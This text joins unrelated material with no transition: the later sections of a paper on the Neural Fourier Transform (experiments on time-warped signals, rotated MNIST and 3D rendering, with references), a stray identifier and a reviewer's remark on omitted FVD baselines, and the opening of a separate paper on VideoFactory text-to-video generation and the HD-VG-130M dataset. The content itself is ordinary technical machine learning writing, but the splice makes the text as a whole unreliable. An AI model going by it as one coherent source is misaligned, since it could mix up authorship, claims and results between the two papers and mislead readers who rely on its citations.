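c = rng.uniform(-1, 1, K) * scale
v = int(rng.integers(1, N))                    # hidden shift velocity per sequence
triplet = [warped_signal(c, m=k * v) for k in range(3)]  # (l0, l1, l2) for U-NFT
```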
To check whether the frequencies \( F \) obtained by NFT are correct, we use the result from representation theory stating that, if \( \rho_f : \mathbb{Z}_N \to \mathbb{R}^{d_f \times d_f} \) is the irreducible representation corresponding to the frequency \( f \), the character inner product (Fulton and Harris, 1991) satisfies
\[
\langle \rho_f | \rho_{f'} \rangle = \frac{1}{N} \sum_{g \in \mathbb{Z}_N} \text{trace}(\rho_f(g)) \, \text{trace}(\rho_{f'}(g)) = \delta_{ff'}
\]
(\( \delta_{ff'} \) is Kronecker's delta). We can thus validate the frequencies captured in the simultaneously block-diagonalized \( M_* \)'s by taking the character inner product of each identified block \( B_i \) with the known frequencies. The center plot in Fig. 5 is the graph of \( \mathbb{E}[\langle \rho_f | B_i \rangle] \) plotted against \( f \). We see that spikes occur only at the major frequencies in \( F \) (i.e., \( \{8, 15, 22, 40, 45\} \)), indicating that NFT successfully captures the major symmetry modes hidden in the dataset without any supervision. When we repeated this experiment with 100 instances of randomly sampled \( F \) of the same size, NFT was able to recover the major members of \( F \) with \( (\mathrm{FN}, \mathrm{FP}) = (0.035, 0.022) \) by thresholding \( \mathbb{E}[\langle \rho_f | M_* \rangle] \) at 0.5. This score did not change much even when we reduced the number of samples to 5000 ((0.04, 0.028)). This experimental result also validates that the disentangled features reported in (Miyato et al., 2022) are in fact the set of major frequencies in the sense of classical DFT. We can also confirm that the underlying symmetry can be recovered even when the deformation is applied to 2D images (Fig. 6).

Figure 4: Visualization of the time-warped signal dataset of Sec. 5.1.

**Data compression with NFT.** In signal processing, FT is also used as a tool to compress data based on the shift-equivariance structure of signals. We generated 5000 instances of the time-warped signals with \( F \subset \{0{:}16\} \) and applied U-, G-, and g-NFT to compress the dataset using an encoder output of dimension \( \mathbb{R}^{32 \times 1} \). We also added independent Gaussian noise at each time point in the training signals. For G-NFT, we used the direct sum of 16 commutative \( 2 \times 2 \) matrices of the form \( ((a, -b), (b, a)) \) to parameterize \( M \). For g-NFT, we used the \( 2 \times 2 \) block-diagonal matrix \( M(\theta) = \bigoplus_{\ell=0}^{15} \begin{pmatrix} \cos \ell \theta & -\sin \ell \theta \\ \sin \ell \theta & \cos \ell \theta \end{pmatrix} \) with known \( \theta \).\(^1\) We evaluated the reconstruction losses of these NFT variants on test signals and compared them against DFT over frequencies in the range \( \{0{:}16\} \) (Fig. 12, Appendix). The mean squared errors, together with standard deviations in parentheses, are shown in Table 1, which clearly demonstrates that NFT learns the nonlinearity of the observation and compresses the data appropriately according to the hidden frequencies. It is also reasonable that g-NFT, which uses the identity of the group element \( g \) acting on each signal, achieves more accurate compression than G-NFT. DFT fails to compress the data effectively, which is obvious from Fig. 3.

\(^1\)When the scalar field is \( \mathbb{R} \), \( 2 \times 2 \) blocks are the smallest irreducible representations, instead of \( 1 \times 1 \) over the complex numbers.

Figure 5: Left: Long-horizon future prediction of the sequence of time-warped signals. Center: \( \mathbb{E}[\langle \rho_f | B \rangle] \) plotted against \( f \in [0, 64] \) for each block \( B \) in the block-diagonalized \( M_* \) learned from the dataset with 5 major frequencies (\( \{8, 15, 22, 40, 45\} \)) and 2 noise frequencies with small coefficients (\( \{18, 43\} \)), when \( M_* \) can express at most 5 frequencies. Note that \( \mathbb{E}[\langle \rho_f | M_* \rangle] \) is linear with respect to \( M_* \) (Appendix A.3). Right: Average absolute values of the block-diagonalized \( M_* \)'s.
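As a concrete illustration of the validation step, the sketch below evaluates the character inner product between a candidate $2 \times 2$ block and the known irreducible representations of $\mathbb{Z}_N$; `B_of_g` is a stand-in for a block obtained by simultaneous block-diagonalization of the learned $M_*$'s. Over $\mathbb{R}$, the inner product of a 2-dimensional irreducible with itself evaluates to 2 rather than 1, so the 0.5 threshold still separates matches from mismatches:

```python
import numpy as np

N = 128

def rot(theta):
    return np.array([[np.cos(theta), -np.sin(theta)],
                     [np.sin(theta),  np.cos(theta)]])

def char_inner(block_of_g, f):
    """<rho_f | B> = (1/N) sum_g trace(rho_f(g)) trace(B(g))."""
    vals = [np.trace(rot(2 * np.pi * f * g / N)) * np.trace(block_of_g(g))
            for g in range(N)]
    return float(np.mean(vals))

B_of_g = lambda g: rot(2 * np.pi * 22 * g / N)  # pretend the block carries f = 22
print(char_inner(B_of_g, 22), char_inner(B_of_g, 8))  # ~2.0 (match), ~0.0 (mismatch)
```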
Figure 6: Horizontal shift of unseen objects in fisheye view, predicted from the left-most frame by U-NFT trained on CIFAR100 (Krizhevsky et al., 2009) sequences with $T = 4$ (top: prediction, bottom: ground truth). U-NFT learns the deformed shifts, which are not expressible as linear functions of the input coordinates.

5.2 Application to Images

We verify the representation ability of NFT by applying it to challenging tasks involving out-of-domain (OOD) generalization and recovery from occlusion. Code is in the supplementary material.

**Rotated MNIST.** We applied g-NFT to the MNIST (LeCun et al., 1998) dataset with the SO(2) rotation action and used it as a tool for unsupervised representation learning with OOD generalization. To this end, we trained $(\Phi, \Psi)$ on the in-domain dataset (rotated MNIST), and applied logistic regression on the output of $\Phi$ for the downstream classification task on rotated MNIST (in-domain) as well as on rotated Fashion-MNIST (Xiao et al., 2017) and rotated Kuzushiji-MNIST (Clanuwat et al., 2018) (two out-of-domain datasets). Following the standard procedure as in (Chen et al., 2020), we trained the regression classifier for the downstream task with $\Phi$ fixed. We used data consisting of triplets $(g_\theta \circ x, g_{\theta'} \circ x, \theta' - \theta)$, with $x$ a digit image and $\theta, \theta' \sim \text{Uniform}(0, 2\pi)$ random rotation angles. We used the same transition matrix $M(\theta)$ as in the data compression experiment (Sec 5.1) with maximum frequency $l_{\max} = 2$, plus a one-dimensional trivial representation. Details are in Appendix D.

Because the representation learned with NFT is decomposed into frequencies, we can build a feature by taking the absolute value of each frequency component; that is, by interpreting the latent variable in $\mathbb{R}^{(2l_{\max}+1) \times d_m}$ as $l_{\max} + 1$ frequencies of multiplicity $d_m$ each (the trivial representation is 1-dimensional), we take the norm of each frequency component to produce an $(l_{\max} + 1) \times d_m$-dimensional feature. This is analogous to taking the absolute value of each coefficient in DFT. We designate this approach as norm in Fig. 7. As we can see in the right panel of Fig. 7, both g-NFT and g-NFT-norm perform competitively against conventional methods; in particular, g-NFT-norm consistently outperforms all competitors on OOD. In the left panel, although a larger $l_{\max}$ generally benefits OOD performance, too large a value of $l_{\max}$ seems to cause overfitting, just as in classical FT analysis.
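The norm feature described above can be sketched in a few lines; the latent layout (a 1-dimensional trivial block followed by $l_{\max}$ two-dimensional blocks, each with multiplicity $d_m$) is our assumed convention rather than the authors' exact tensor layout:

```python
import numpy as np

l_max, d_m = 2, 32
z = np.random.randn(2 * l_max + 1, d_m)    # latent: trivial rep + l_max 2-dim blocks

def norm_feature(z):
    feats = [np.abs(z[0])]                 # trivial (0-th) frequency: 1-dimensional
    for l in range(l_max):                 # each nonzero frequency: a 2-dim block
        block = z[1 + 2*l : 3 + 2*l]       # shape (2, d_m)
        feats.append(np.linalg.norm(block, axis=0))  # rotation-invariant norms
    return np.concatenate(feats)           # (l_max + 1) * d_m invariant features

print(norm_feature(z).shape)               # (96,) for l_max = 2, d_m = 32
```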
We also compared NFT against Steerable CNN (Cohen and Welling, 2017), which assumes that the acting $G$ is a rotation group. We gave Steerable CNN a competitive advantage by training the model with classification labels on rotMNIST, and fine-tuned the final logit layer on all three datasets: the in-domain dataset (rotMNIST) and two OOD datasets (rotFMNIST and rotKuzushiji-MNIST). Steerable CNN with supervision outperforms all our baselines on the in-domain dataset, but not on the OOD datasets. We believe this is because, as pointed out in (Cohen et al., 2018), Steerable CNN functions as a composition of filters that preferentially choose the frequencies relevant to the task used in training, so that the model learns $G$-linear maps overfitted to classifying the rotMNIST dataset. Also see Appendix E for rotMNIST under a more challenging condition involving occlusion.

Table 1: Reconstruction error of data compression for time-warped 1D signals.

| Noise level | g-NFT | G-NFT | DFT ($N_f = 16$) |
|-----------------|------------------------------------|------------------------------------|------------------|
| Noiseless | $3.59 \pm 1.29 \times 10^{-5}$ | $1.98 \pm 1.89 \times 10^{-2}$ | 8.10 |
| $\sigma = 0.01$ | $2.62 \pm 0.26 \times 10^{-4}$ | $2.42 \pm 1.19 \times 10^{-2}$ | – |
| $\sigma = 0.05$ | $1.42 \pm 0.14 \times 10^{-3}$ | $5.82 \pm 1.15 \times 10^{-2}$ | – |
| $\sigma = 0.1$ | $2.53 \pm 0.09 \times 10^{-3}$ | $1.16 \pm 0.22 \times 10^{-1}$ | – |

Figure 7: OOD generalization ability of NFT trained on rotMNIST. Top left: Prediction by g-NFT with various maximum frequencies $l_{\text{max}}$. Bottom left: Prediction errors of g-NFT. Right: Classification accuracy of a linear probe, compared against an autoencoder (AE), SimCLR (Chen et al., 2020), the invariant autoencoder (IAE) (Winter et al., 2022), and supervised models including the $C_n$ steerable CNN (Cohen and Welling, 2017) and the $SO(2)$ steerable CNN (Weiler et al., 2018). Each line is the mean accuracy over 10 seeds, with the shaded area showing the standard deviation.

**Learning 3D Structure from 2D Rendering.** We also applied g-NFT to novel view synthesis from a single 2D rendering of a 3D object. This is a challenging task because it cannot be formulated as a pixel-based transformation: in every rendering, the rear side of the object is occluded. We used three datasets: ModelNet10-SO3 (Liao et al., 2019) at $64 \times 64$ resolution, BRDFs (Greff et al., 2022) ($224 \times 224$), and ABO-Material (Collins et al., 2022) ($224 \times 224$). Each dataset contains multiple 2D images rendered from different camera positions. We trained the autoencoder with the same procedure as for MNIST, except that we used Wigner D matrix representations of $SO(3)$ with $l_{\text{max}} = 4$.² We used a Vision Transformer (Dosovitskiy et al., 2021) to model $\Phi$ and $\Psi$. The prediction results (Fig. 8) demonstrate that g-NFT accurately predicts the 2D rendering of a 3D rotation. We also studied each frequency component by masking out all other frequencies before decoding the latent; please also see the rendered movie in the supplementary material. Note that the 0-th frequency (F0) captures features invariant to rotation, such as color. F1 (second row) captures orientation information, and higher frequencies extract symmetries of the object shapes; for example, F3 depicts triangle-like shapes having rotational symmetry of degree 3, similar to a spherical harmonics decomposition in 3D space (Fig. 18). See Appendix D for details.
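The per-frequency analysis used for Fig. 8 amounts to masking the latent before decoding. Below is a minimal sketch under an assumed latent layout for $SO(3)$ (Wigner D blocks of size $2l+1$ stacked along the first axis, with multiplicity $d_m$); `Psi` stands for the trained decoder:

```python
import numpy as np

l_max, d_m = 4, 16
dim = sum(2 * l + 1 for l in range(l_max + 1))   # 1 + 3 + 5 + 7 + 9 = 25
z = np.random.randn(dim, d_m)                    # stand-in for P @ Phi(x)

def keep_frequency(z, k):
    """Zero out every Wigner-D block except the k-th before decoding."""
    out = np.zeros_like(z)
    start = sum(2 * l + 1 for l in range(k))     # offset of the k-th block
    out[start : start + 2 * k + 1] = z[start : start + 2 * k + 1]
    return out

# Decoding Psi(keep_frequency(z, 0)) keeps only rotation-invariant content
# such as color, while k = 1 keeps orientation information.
for k in range(l_max + 1):
    zk = keep_frequency(z, k)
```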
6 RELATED WORKS AND DISCUSSIONS

As a tool in equivariant deep learning, group convolution (GC) has been extensively studied (Cohen and Welling, 2017; Cohen et al., 2019; Krizhevsky et al., 2012). NFT differs from GC as well as from FT in that it does not assume $g$ to act linearly on the input. In the words of (Kondor and Trivedi, 2018), FT and GC assume that each instance $x \in X$ is a function defined on a homogeneous space, i.e., a copy of the acting group modulo stabilizers. These methods must build explicit knowledge of the group structure into the model architecture (Finzi et al., 2021).

²We used the $SO(2)$ representation for BRDFs, since its camera positions have a fixed elevation.

Figure 8: Novel view synthesis from a single image of a test object unseen during training (from left to right: ModelNet, BRDFs, ABO). From bottom to top: ground truth, g-NFT prediction, and the decoder output with the $k$-th frequency only. For ABO, the same backgrounds were used repeatedly in both the training and test datasets.

(Burkhardt, 2007) used group-invariant kernels, but limited their scope to situations similar to FT. When the action is linear, the philosophy of G-NFT also shares much with (Cohen and Welling, 2014). Among other efforts to find symmetry under nonlinear actions, (Dupont et al., 2020) map the input to a latent space of volumetric form and apply a linear rotation operation on the voxels, yielding an instance of g-NFT. (Shakerinava et al., 2022) use different types of (polynomial) invariants that are specific to a group or a family of groups, instead of linearized group actions in the form of representations. (Falorsi et al., 2018) map the observations to the matrix group $SO(3)$ itself. (Park et al., 2022) first map the input to an intermediate latent space with a black-box function and then apply the convolution of a known symmetry for contrastive learning. Finally, the Koopman operator (Brunton et al., 2022) is closely related to the philosophy of NFT in that it linearizes a single nonlinear dynamical system; NFT differs in that it seeks latent linear transitions with structures (e.g., frequencies) that are specific to the group.

Most relevant to this work, (Miyato et al., 2022) present an implementation of U-NFT and use it to disentangle the modes of actions. However, they do not present the other versions of NFT (g-NFT, G-NFT), and, most importantly, they neither provide theoretical foundations that guarantee identifiability nor establish the "learning of linearized equivariance" as an extension of the Fourier transform. By formally connecting Fourier analysis with their results, the current work shows that the contextual disentanglement often analyzed in the framework of probabilistic generative models (Zhang et al., 2020; Kim and Mnih, 2018) or direct products of groups (Higgins et al., 2018; Yang et al., 2021) may also be described in terms of Fourier frequencies. To our knowledge, we are the first to provide a formal theory for seeking linear representations on datasets with group symmetries defined by nonlinear actions.

7 LIMITATIONS AND FUTURE WORK

As stated in Sec 3.1, NFT requires a dataset consisting of (short) tuples, because it needs to observe transitions in order to learn the equivariance hidden in nonlinear actions; this might be a practical limitation. Also, although NFT can identify the major frequencies of data-specific symmetry, it does not identifiably preserve the norms in the latent space, and hence the size of the coefficients of each frequency, because the scale of $\Phi$ is undetermined.
Finally, while NFT is a framework for which we have provided theoretical guarantees of existence and identifiability in general cases, it remains to establish an algorithm that is guaranteed to find the solution to eq.(3). As stated in (Miyato et al., 2022), there is as yet no proof that the autoencoder loss of Sec 3.1 finds the optimal solution, and resolving this problem is future work of great practical importance.

REFERENCES

T. Akiba, S. Sano, T. Yanase, T. Ohta, and M. Koyama. Optuna: A next-generation hyperparameter optimization framework. In SIGKDD, pages 2623-2631, 2019.

S. L. Brunton, M. Budisic, E. Kaiser, and J. N. Kutz. Modern Koopman theory for dynamical systems. SIAM Review, 64(2):229-340, 2022. doi: 10.1137/21M1401243. URL https://doi.org/10.1137/21M1401243.

T. Ceccherini-Silberstein, F. Scarabotti, and F. Tolli. Harmonic Analysis on Finite Groups. Cambridge University Press, 2007.

G. Cesa, L. Lang, and M. Weiler. A program to build E(N)-equivariant steerable CNNs. In ICLR, 2022. URL https://openreview.net/forum?id=WE4ge9xlnQw.

H. Chen, S. Liu, W. Chen, H. Li, and R. Hill. Equivariant point network for 3D point cloud analysis. In CVPR, pages 14514-14523, 2021.

T. Chen, S. Kornblith, M. Norouzi, and G. Hinton. A simple framework for contrastive learning of visual representations. In ICML, pages 1597-1607, 2020.

T. Clanuwat, M. Bober-Irizar, A. Kitamoto, A. Lamb, K. Yamamoto, and D. Ha. Deep learning for classical Japanese literature. arXiv preprint arXiv:1812.01718, 2018.

M. Clausen and U. Baum. Fast Fourier Transforms. Wissenschaftsverlag, 1993.

T. Cohen and M. Welling. Learning the irreducible representations of commutative Lie groups. In ICML, pages 1755-1763, 2014.

T. Cohen and M. Welling. Group equivariant convolutional networks. In ICML, pages 2990-2999, 2016.

T. Cohen, M. Geiger, and M. Weiler. A general theory of equivariant CNNs on homogeneous spaces. In NeurIPS, 2019.

T. S. Cohen and M. Welling. Steerable CNNs. In ICLR, 2017.

T. S. Cohen, M. Geiger, and M. Weiler. Intertwiners between induced representations (with applications to the theory of equivariant neural networks). arXiv preprint arXiv:1803.10743, 2018.

J. Collins, S. Goel, K. Deng, A. Luthra, L. Xu, E. Gundogdu, X. Zhang, T. F. Yago Vicente, T. Dideriksen, H. Arora, M. Guillaumin, and J. Malik. ABO: Dataset and benchmarks for real-world 3D object understanding. In CVPR, 2022.

defisheye Contributors. defisheye. https://pypi.org/project/defisheye/, 2019. [Software].

A. Dosovitskiy, L. Beyer, A. Kolesnikov, D. Weissenborn, X. Zhai, T. Unterthiner, M. Dehghani, M. Minderer, G. Heigold, S. Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In ICLR, 2021.

E. Dupont, M. A. Bautista, A. Colburn, A. Sankar, C. Guestrin, J. Susskind, and Q. Shan. Equivariant neural rendering. In ICML, 2020.

L. Falorsi, P. de Haan, T. R. Davidson, N. De Cao, M. Weiler, P. Forré, and T. S. Cohen. Explorations in homeomorphic variational auto-encoding. arXiv preprint arXiv:1807.04689, 2018.

M. Finzi, M. Welling, and A. G. Wilson. A practical method for constructing equivariant multilayer perceptrons for arbitrary matrix groups. In ICML, 2021.

G. B. Folland. A Course in Abstract Harmonic Analysis. Taylor and Francis, 1994. ISBN 9780849384905.

W. Fulton and J. Harris. Representation Theory: A First Course. Springer New York, 1991. ISBN 9780387974958. URL https://books.google.co.jp/books?id=6GUH8ARxhp8C.

K. Greff, F. Belletti, L. Beyer, C.
Doersch, Y. Du, D. Duckworth, D. J. Fleet, D. Gnanapragasam, F. Golemo, C. Herrmann, T. Kipf, A. Kundu, D. Lagun, I. Laradji, H.-T. D. Liu, H. Meyer, Y. Miao, D. Nowrouzezahrai, C. Oztireli, E. Pot, N. Radwan, D. Rebain, S. Sabour, M. S. M. Sajjadi, M. Sela, V. Sitzmann, A. Stone, D. Sun, S. Vora, Z. Wang, T. Wu, K. M. Yi, F. Zhong, and A. Tagliasacchi. Kubric: a scalable dataset generator. In CVPR, 2022.
dUDwK38MVC
- When comparing FVDs on UCF-101, the paper includes many previous works, but only those whose FVD scores are higher: https://paperswithcode.com/sota/video-generation-on-ucf-101. In this way, it omits Make-A-Video, VDIM, LVDM, etc., despite comparing against them in other regards. I do not see how this could be justified.
VIDEOFACTORY: SWAP ATTENTION IN SPATIOTEMPORAL DIFFUSIONS FOR TEXT-TO-VIDEO GENERATION

Anonymous authors
Paper under double-blind review

ABSTRACT

We present VideoFactory, an innovative framework for generating high-quality open-domain videos. VideoFactory excels in producing high-definition (1376×768), widescreen (16:9) videos without watermarks, creating an engaging user experience. Generating videos guided by text instructions poses significant challenges, such as modeling the complex relationship between space and time and the lack of large-scale text-video paired data. Previous approaches extend pretrained text-to-image generation models by adding temporal 1D convolution/attention modules for video generation. However, these approaches overlook the importance of jointly modeling space and time, inevitably leading to temporal distortions and misalignment between texts and videos. In this paper, we propose a novel approach that strengthens the interaction between spatial and temporal perceptions. In particular, we utilize a swapped cross-attention mechanism in 3D windows that alternates the "query" role between spatial and temporal blocks, enabling mutual reinforcement. To fully unlock model capabilities for high-quality video generation, we curate a large-scale video dataset called HD-VG-130M. This dataset comprises 130 million open-domain text-video pairs with high-definition, widescreen, and watermark-free characteristics. Objective metrics and user studies demonstrate the superiority of our approach in terms of per-frame quality, temporal correlation, and text-video alignment, by clear margins.

1 INTRODUCTION

Automated video production is experiencing a surge in demand across various industries, including media, gaming, film, and television (Joshi et al., 2017; Menapace et al., 2021). This increased demand has propelled video generation research to the forefront of deep generative modeling, leading to rapid advancements in the field (Ho et al., 2022b; Mathieu et al., 2016; Saito et al., 2017; Tulyakov et al., 2018; Vondrick et al., 2016). In recent years, diffusion models (Ho et al., 2020) have demonstrated remarkable success in generating visually appealing images in open domains (Rombach et al., 2022; Ramesh et al., 2022b; Podell et al., 2023). Building upon this success, in this paper we take one step further and aim to extend their capabilities to high-quality text-to-video generation.

As is widely known, the development of open-domain text-to-video models poses grand challenges, due to the limited availability of large-scale text-video paired data and the complexity of constructing space-time models from scratch. To address these challenges, current approaches are primarily built on pretrained image generation models. These approaches typically adopt space-time separable architectures, where spatial operations are inherited from the image generation model (Ho et al., 2022b; Hong et al., 2022). To further incorporate temporal modeling, various strategies have been employed, including pseudo-3D modules (Singer et al., 2022; Zhou et al., 2022), serial 2D and 1D blocks (Blattmann et al., 2023; Ho et al., 2022a), and parameter-free techniques such as temporal shift (An et al., 2023) or tailored spatiotemporal attention (Wu et al., 2023; Khachatryan et al., 2023b). However, these approaches overlook the crucial interplay between time and space that visually engaging text-to-video generation requires.
On one hand, parameter-free approaches rely on manually designed rules that fail to capture the intrinsic nature of videos and often lead to unnatural motions. On the other hand, learnable 2D+1D modules and blocks primarily focus on temporal modeling, either directly feeding temporal features into spatial features or combining them through simplistic element-wise additions. This limited interactivity usually results in temporal distortions and discrepancies between the input texts and the generated videos, which hinders the overall quality and coherence of the generated content.

To address the above issues, we take one step further in this paper and highlight the complementary nature of spatial and temporal features in videos. Specifically, we propose a novel Swapped spatiotemporal Cross-Attention (Swap-CA) for text-to-video generation. Instead of solely relying on separable 2D+1D self-attention (Bertasius et al., 2021) or 3D window self-attention (Liu et al., 2022), which replace the computationally expensive full 3D self-attention as shown in Fig. 1(a)-(c), we aim to further enhance the interaction between spatial and temporal features. As shown in Fig. 1(d), our swap attention mechanism facilitates bidirectional guidance between spatial and temporal features by treating one feature as the query and the other as the key/value. To ensure reciprocity of information flow, we also swap the role of the "query" in adjacent layers.

By deeply interleaving spatial and temporal features through the proposed swap attention, we present the holistic VideoFactory framework for text-to-video generation. In particular, we adopt the latent diffusion framework and design a spatiotemporal U-Net for 3D noise prediction. To unlock the full potential of the proposed model and fulfill high-quality video generation, we construct the largest video generation dataset to date, named HD-VG-130M. This dataset consists of 130 million open-domain text-video pairs with high-definition, widescreen, and watermark-free characteristics. Additionally, our spatial super-resolution model can effectively upsample videos to a resolution of $1376 \times 768$, ensuring an engaging visual experience. We conduct comprehensive experiments and show that our approach outperforms existing methods in both quantitative and qualitative comparisons. In summary, our paper makes the following significant contributions:

- We reveal the significance of learning joint spatial and temporal features for video generation, and introduce a novel Swap-CA mechanism to reinforce both space and time interactions. It significantly improves generation quality while ensuring precise semantic alignment between the input text and the generated videos.
- We curate a comprehensive dataset comprising 130 million text-video pairs, the largest to date, which is the first to support high-quality video generation with high-definition, widescreen, and watermark-free characteristics. We believe this dataset will greatly benefit fellow researchers and advance the field of video generation.¹

¹Anonymous preview: Google Drive. It will be fully released upon the acceptance of our submission.

## 2 RELATED WORKS

**Text-to-Image Generation.** Generating realistic images from corresponding descriptions combines the challenging components of language modeling and image generation.
Traditional text-to-image generation methods (Mansimov et al., 2016; Reed et al., 2016; Xu et al., 2018; Zhang et al., 2017) are mainly based on GANs (Goodfellow et al., 2014) and are only able to model simple scenes such as birds (Wah et al., 2011). Later works (Ramesh et al., 2021; Ding et al., 2021) extend the scope of text-to-image generation to open domains with better modeling techniques and training data at much larger scales. In recent years, diffusion models have shown great ability in visual generation (Dhariwal & Nichol, 2021). For text-to-image multi-modality generation, GLIDE (Nichol et al., 2021), DALL-E 2 (Ramesh et al., 2022a), and Imagen (Saharia et al., 2022) leverage diffusion models to achieve impressive results. Building on these successes, subsequent works explore latent diffusion (Rombach et al., 2022), customization (Ruiz et al., 2023), image guidance (Yang et al., 2023), and precise control (Balaji et al., 2022). This paper further extends diffusion models to video generation.

**Text-to-Video Generation.** Additional controls are often added to make the generated videos more responsive to demand (Mathieu et al., 2016; Pan et al., 2017; Wang et al., 2018); this paper focuses on text as the controlling modality. Early text-to-video generation models (Li et al., 2018; Pan et al., 2017) mainly use convolutional GAN models with Recurrent Neural Networks (RNNs) to model temporal motions. Although complex architectures and auxiliary losses have been introduced, GAN-based models cannot generate videos beyond simple scenes such as moving digits and close-up actions. Recent works extend text-to-video generation to open domains with large-scale transformers (Yu et al., 2022a) or diffusion models (Ho et al., 2022a). Considering the difficulty of high-dimensional video modeling and the scarcity of text-video datasets, training text-to-video generation from scratch is unaffordable; as a result, most works acquire knowledge from pretrained text-to-image models. CogVideo (Hong et al., 2022) inherits from the pretrained text-to-image model CogView2 (Ding et al., 2022). Imagen Video (Ho et al., 2022a) and Phenaki (Villegas et al., 2022) adopt joint image-video training. Make-A-Video (Singer et al., 2022) learns motion from video data alone, eliminating the dependency on paired text-video data. To reduce the high cost of video generation, latent diffusion has been widely utilized (An et al., 2023; Blattmann et al., 2023; Esser et al., 2023; He et al., 2022b,a; Khachatryan et al., 2023a; Ma et al., 2023; Wu et al., 2022, 2023; Yu et al., 2023; Zhou et al., 2022). MagicVideo (Zhou et al., 2022) inserts a simple adaptor after the 2D convolution layer. Latent-Shift (An et al., 2023) adopts a parameter-free temporal shift module to exchange information across frames. PVDM (Yu et al., 2023) projects the 3D video latent into three 2D image-like latent spaces. Although research on text-to-video generation is very active, existing work ignores the interplay between spatial and temporal modules. In this paper, we revisit the design of text-driven video generation.

## 3 HIGH-DEFINITION VIDEO GENERATION DATASET

Datasets of diverse text-video pairs are the prerequisite for training open-domain text-to-video generation models. However, existing text-video datasets are always limited in either scale or quality, thus hindering the upper bound of high-quality video generation.
Referring to Tab. 1, MSR-VTT (Xu et al., 2016) and UCF101 (Soomro et al., 2012) only have 10K and 13K video clips, respectively. Although large in scale, HowTo100M (Miech et al., 2019) is specific to instructional videos, which limits its diversity for open-domain generation tasks. Despite being appropriate in both scale and domain, the textual annotations in HD-VILA-100M (Xue et al., 2022) are subtitle transcripts, which lack the descriptions of visual content needed for high-quality video generation. Additionally, the videos in HD-VILA-100M have complex scene transitions, which are disadvantageous for models learning temporal correlations. WebVid-10M (Bain et al., 2021) has been used in previous video generation works (Ho et al., 2022a; Singer et al., 2022), considering its relatively large scale (10M) and descriptive captions. Nevertheless, videos in WebVid-10M are of low resolution and have poor visual quality, with watermarks in the center.

To tackle the problems above and achieve high-quality video generation, we propose a large-scale text-video dataset, namely **HD-VG-130M**, including 130M open-domain text-video pairs in high-definition (720p), widescreen, watermark-free format. We first collect high-definition videos from YouTube. The challenge lies in converting raw HD videos into video-caption pairs, which is far from straightforward. As the original videos contain complex scene transitions, which are adverse for models learning temporal correlations, we detect and split scenes in these original videos using PySceneDetect (Breakthrough), resulting in 130M single-scene video clips. Finally, we caption the video clips with BLIP-2 (Li et al., 2023), in view of its large-scale vision-language pretraining knowledge. Specifically, we extract the central frame of each clip as the keyframe, and annotate each clip by captioning its keyframe with BLIP-2 (Li et al., 2023). Note that the video clips in HD-VG-130M are single-scene, which ensures that the keyframe captions are representative enough to describe the content of the whole clip in most circumstances.

Table 1: Comparison of different video datasets. Existing text-video datasets are always limited in either scale or quality, while our HD-VG-130M includes 130M open-domain text-video pairs in high-definition, widescreen format, devoid of scene transitions, and free from watermarks. Captions are premium-quality text labels for videos; in contrast, class labels tend to be overly simplistic, and subtitles are not synchronized with the visual contents of the video.

| Dataset | Video clips | Resolution | Domain | Text | Transition-free | Watermark-free |
|------------------|-------------|------------|--------------|-------------|-----------------|----------------|
| MSR-VTT (2016) | 10K | 240p | open | caption | ✓ | ✓ |
| UCF101 (2012) | 13K | 240p | human action | class label | ✓ | ✓ |
| HowTo100M (2019) | 136M | 240p | instructional | subtitle | × | ✓ |
| HD-VILA-100M (2022) | 103M | 720p | open | subtitle | × | ✓ |
| WebVid-10M (2021) | 10M | 360p | open | caption | ✓ | × |
| HD-VG-130M (Ours) | 130M | 720p | open | caption | ✓ | ✓ |

Figure 2: Statistics of video categories, clip durations, and caption word lengths in HD-VG-130M. HD-VG-130M covers a wide range of video categories.

The statistics of HD-VG-130M are shown in Fig. 2. The videos in HD-VG-130M cover 15 categories; this wide range of domains is beneficial for training the models to generate diverse content. After scene detection, the video clips are mostly single-scene with durations of less than 20 seconds. The textual annotations are descriptive captions related to the visual content, mostly around 10 words long. Text-video examples from HD-VG-130M can be found in Figs. 9-10 in the appendix.
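The clip-splitting and captioning procedure described in this section can be sketched as follows, using the public PySceneDetect and HuggingFace BLIP-2 APIs; the specific checkpoint and the OpenCV-based keyframe extraction are illustrative choices rather than the paper's exact setup:

```python
import cv2
from PIL import Image
from scenedetect import detect, ContentDetector
from transformers import Blip2Processor, Blip2ForConditionalGeneration

processor = Blip2Processor.from_pretrained("Salesforce/blip2-opt-2.7b")
model = Blip2ForConditionalGeneration.from_pretrained("Salesforce/blip2-opt-2.7b")

def caption_clips(video_path: str):
    pairs = []
    for start, end in detect(video_path, ContentDetector()):  # split at transitions
        mid = (start.get_frames() + end.get_frames()) // 2    # central keyframe
        cap = cv2.VideoCapture(video_path)
        cap.set(cv2.CAP_PROP_POS_FRAMES, mid)
        ok, frame = cap.read()
        cap.release()
        if not ok:
            continue
        image = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
        inputs = processor(images=image, return_tensors="pt")
        out = model.generate(**inputs, max_new_tokens=30)
        text = processor.batch_decode(out, skip_special_tokens=True)[0].strip()
        pairs.append(((start, end), text))                    # (clip span, caption)
    return pairs
```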
## 4 HIGH-QUALITY TEXT-TO-VIDEO GENERATION

**Spatiotemporal Inter-Connection.** To reduce computational costs and leverage pretrained image generation models, space-time separable architectures have gained popularity in text-to-video generation (Ho et al., 2022b; Hong et al., 2022). These architectures handle spatial operations independently on each frame, while temporal operations consider multiple frames at each spatial position. In the following, we refer to the features predicted by the 2D/spatial modules of space-time separable networks as "spatial features", and to those predicted by the 1D/temporal modules as "temporal features". The quality of spatiotemporal features is important for video generation, as it affects temporal consistency and text-content alignment (Hong et al., 2022; Ho et al., 2022a). The interaction between spatial and temporal features is also essential, as it determines how the two are combined. This interaction has been highlighted in previous video-related studies (Bertasius et al., 2021; Zeng et al., 2020) and verified in cross-modality learning (Gu et al., 2023; Ruan et al., 2023). However, as discussed in Sec. 1, prior works have neglected this crucial interaction. To tackle this limitation, we promote the mutual reinforcement of these features through a series of cross-attention operations. Denote the basic operation $\text{CrossAttention}(x, y) = \text{softmax}\big(\frac{QK^T}{\sqrt{d}}\big) \cdot V$, with
$$Q = W_Q^{(i)} \cdot x, \quad K = W_K^{(i)} \cdot y, \quad V = W_V^{(i)} \cdot y,$$
where $W_Q^{(i)}, W_K^{(i)},$ and $W_V^{(i)}$ are learnable projection matrices in the $i$-th layer.

